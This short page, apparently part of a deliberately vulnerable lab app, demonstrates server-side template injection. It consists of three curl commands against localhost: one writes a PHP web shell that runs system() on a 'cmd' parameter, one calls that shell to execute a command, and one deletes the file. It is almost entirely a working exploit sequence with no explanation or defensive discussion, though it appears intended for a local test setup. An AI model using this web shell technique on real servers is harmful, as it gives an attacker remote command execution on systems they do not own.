Server-Side Includes (SSI) Demo
SSI / Template Injection
Test SSTI via File Write + Include
# Step 1: Create PHP file via template injection curl "http://localhost/ssi.php?template=shell.php&content=%3C%3Fphp%20system(%24_GET%5B'cmd'%5D)%3B%20%3F%3E" # Step 2: Access created shell curl "http://localhost/templates/shell.php?cmd=id" # Step 3: Clean up curl "http://localhost/ssi.php?template=shell.php&content="